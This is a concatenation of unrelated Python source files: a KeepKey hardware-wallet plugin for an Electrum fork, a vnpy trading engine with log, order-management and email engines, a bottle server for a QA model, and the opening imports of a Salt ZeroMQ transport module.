from electrum_onion.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_onion.bip32 import BIP32Node
from electrum_onion import constants
from electrum_onion.i18n import _
from electrum_onion.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_onion.keystore import Hardware_KeyStore
from electrum_onion.plugin import Device, runs_in_hwd_thread
from electrum_onion.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
    SUPPORTED_XTYPES = ('standard',)  # , 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh'
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "DeepOnion"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
            # Must be short as Qt doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.timestamp = tx.ntime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
engine.py
|
"""
"""
import logging
from logging import Logger
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type, Dict, List, Optional
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest,
OrderData,
BarData,
TickData,
TradeData,
PositionData,
AccountData,
ContractData,
Exchange
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine: EventEngine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways: Dict[str, BaseGateway] = {}
self.engines: Dict[str, BaseEngine] = {}
self.apps: Dict[str, BaseApp] = {}
self.exchanges: List[Exchange] = []
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any) -> "BaseEngine":
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway]) -> BaseGateway:
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine":
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
return engine
def init_engines(self) -> None:
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = "") -> None:
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str) -> BaseGateway:
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str) -> "BaseEngine":
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]:
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self) -> List[str]:
"""
        Get all names of gateways added in main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self) -> List[BaseApp]:
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self) -> List[Exchange]:
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str) -> None:
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None:
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str) -> str:
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str) -> None:
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
"""
        Query bar history data from a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
return None
def close(self) -> None:
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
    Abstract class for implementing a function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level: int = SETTINGS["log.level"]
self.console_logging_level: int = 40
self.file_logging_level: int = 20
self.logger: Logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self) -> None:
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self) -> None:
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.console_logging_level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self) -> None:
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y-%m-%d=%H-%M")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
print("Jinchao LogEngine - log file path: ", file_path)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.file_logging_level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event) -> None:
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks: Dict[str, TickData] = {}
self.orders: Dict[str, OrderData] = {}
self.trades: Dict[str, TradeData] = {}
self.positions: Dict[str, PositionData] = {}
self.accounts: Dict[str, AccountData] = {}
self.contracts: Dict[str, ContractData] = {}
self.active_orders: Dict[str, OrderData] = {}
self.add_function()
self.register_event()
def add_function(self) -> None:
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event) -> None:
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event) -> None:
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
        # Otherwise, pop inactive order from dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event) -> None:
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event) -> None:
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event) -> None:
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event) -> None:
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol: str) -> Optional[TickData]:
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid: str) -> Optional[OrderData]:
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid: str) -> Optional[TradeData]:
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid: str) -> Optional[PositionData]:
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid: str) -> Optional[AccountData]:
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol: str) -> Optional[ContractData]:
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self) -> List[TickData]:
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self) -> List[OrderData]:
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self) -> List[TradeData]:
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self) -> List[PositionData]:
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self) -> List[AccountData]:
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self) -> List[ContractData]:
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]:
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread: Thread = Thread(target=self.run)
self.queue: Queue = Queue()
self.active: bool = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = "") -> None:
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = receiver
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self) -> None:
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self) -> None:
""""""
self.active = True
self.thread.start()
def close(self) -> None:
""""""
if not self.active:
return
self.active = False
self.thread.join()
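# Editor's note: hedged wiring sketch for the classes above, kept as a comment
# because this module uses package-relative imports. The import path assumes the
# usual vnpy layout (vnpy.trader.engine); no gateway or app is connected here.
#
#     from vnpy.event import EventEngine
#     from vnpy.trader.engine import MainEngine
#
#     event_engine = EventEngine()
#     main_engine = MainEngine(event_engine)   # registers Log/Oms/Email engines
#     main_engine.write_log("demo started")
#     main_engine.close()                      # stops the event engine, closes engines and gateways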
|
serve.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import signal
import uuid
from queue import Queue
from threading import Thread
import bottle
from tqdm import tqdm
from common import logger
from common import tf
from common.config import get_config_from_args
from common.util import batch
from tasks import get_task_model_class
bottle.BaseRequest.MEMFILE_MAX = 10 * 1024 * 1024
app = bottle.Bottle()
request_queue = Queue()
response_queue = Queue()
def serve(args):
config = get_config_from_args(args, mode='infer')
# tf.enable_eager_execution()
# tf.set_random_seed(config.random_seed)
checkpoint_path = tf.train.latest_checkpoint(config.checkpoint_dir)
# initialize model
sess = tf.Session()
model = get_task_model_class(config.model, config.task)(config)
feed_fn, output_tensors = model.infer_graph(config)
saver = tf.train.Saver(var_list=tf.global_variables())
saver.restore(sess, checkpoint_path)
logger.info("{} loaded, waiting for questions...".format(checkpoint_path))
while True:
msg = request_queue.get()
if msg is None:
break
# call model to do prediction
(request_id, model_id, inputs) = msg
logger.info("begin preprocessing on request={}".format(request_id))
outputs = []
input_features = model.text_to_feature(inputs, config)
logger.info("begin predicting on request={}".format(request_id))
total_batches = len(input_features) // args.batch_size
for batch_feature in tqdm(batch(input_features, args.batch_size),
total=total_batches):
feed = feed_fn(batch_feature)
# logger.info("{}: batch {} started...".format(request_id, idx))
model_outputs = sess.run(output_tensors, feed)
output = model.prepare_outputs(model_outputs, config,
batch_feature)
# logger.info("{}: batch {} done...".format(request_id, idx))
outputs.extend(output)
# prediction_answers = decode_answer(
# contexts, context_spans, start_predictions, end_predictions,
# output_char_start)
# all_answers.extend(prediction_answers)
# all_probabilities.extend([round(float(s), 6)
# for s in norm_scores])
logger.info("prediction for {} finished".format(request_id))
response_queue.put((request_id, model_id, outputs))
@app.post('/qa')
def add_message_to_queue():
user_request = bottle.request.json
user_request_id = user_request.get('request_id', uuid.uuid4().hex[:8])
request_model = user_request.get('model_name', 'bert')
user_input = user_request['input']
bottle_env = bottle.request.environ
client_ip = bottle_env.get('HTTP_X_FORWARDED_FOR') or bottle_env.get(
'REMOTE_ADDR')
logger.info("received request={}, model_name={}, from={}".format(
user_request_id, request_model, client_ip))
request_queue.put((user_request_id, request_model, user_input))
(request_id, model_name, output) = response_queue.get()
logger.info('sending results back to={} for request={}...'.format(
client_ip, request_id))
return {"request_id": request_id, "model_name": model_name,
"output": output}
def main(args):
prediction_worker = Thread(target=serve, args=(args,))
prediction_worker.daemon = True
prediction_worker.start()
def signal_handler(_signal, _frame):
print('You pressed Ctrl+C, exiting now...')
exit(0)
signal.signal(signal.SIGINT, signal_handler)
host = args.ip or 'localhost'
bottle.run(app, host=host, port=args.port)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-ip', '--ip', type=str, default=None,
help='ip to serve.')
parser.add_argument('-p', '--port', type=int, default=60005,
help='port to serve')
parser.add_argument('-c', '--config_file', type=str, default=None,
help='Path to qa model config')
parser.add_argument('-b', '--batch_size', type=int, default=48,)
parser.add_argument('-m', '--model', type=str, default='bert',
choices=('bert', 'ebert'),
help='choose model to load default configuration')
parser.add_argument('-t', '--task', type=str, default='squad_v1.1',
choices=('squad_v1.1', 'squad_v2.0', 'hotpot',
'mnli', 'qqp', 'boolq', 'race'),
                        help='choose task to load default configuration')
main(parser.parse_args())
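# Editor's note: hedged client-side sketch for the /qa route above. The field
# names mirror add_message_to_queue(); the exact shape of "input" depends on the
# task's text_to_feature() and is only a placeholder here.
#     import requests
#     resp = requests.post("http://localhost:60005/qa",
#                          json={"request_id": "demo0001", "model_name": "bert",
#                                "input": ["..."]})
#     print(resp.json()["output"])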
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import
import os
import sys
import copy
import errno
import signal
import hashlib
import logging
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils
import salt.utils.verify
import salt.utils.event
import salt.utils.stringutils
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.exceptions import SaltReqTimeoutError
import zmq
import zmq.error
import zmq.eventloop.ioloop
